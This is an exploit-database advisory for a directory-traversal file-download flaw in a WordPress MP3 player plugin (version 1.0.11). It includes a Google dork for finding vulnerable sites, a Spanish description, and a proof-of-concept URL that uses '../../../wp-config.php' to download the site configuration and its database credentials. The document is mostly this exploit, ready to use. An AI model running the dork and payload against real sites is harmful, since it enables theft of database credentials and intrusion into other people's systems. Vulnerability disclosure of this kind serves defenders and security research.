WordPress Plugin CodeArt Google MP3 Player – File Disclosure Download

  • 作者: QK14 Team
    日期: 2014-12-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35460/
  • # Exploit Title: WordPress CodeArt Google MP3 Player plugin - File
Disclosure Download

# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=

# Date: 02/12/2014

# Exploit Author: QK14 Team

# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/

# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/

# Version: 1.0.11

# http://wordpressa.quantika14.com/repository/index.php?id=14

 

Descripci�n:

 

Este plugin es vulnerable a File Disclosure Download.

Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.

 

POF:

localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php
    Python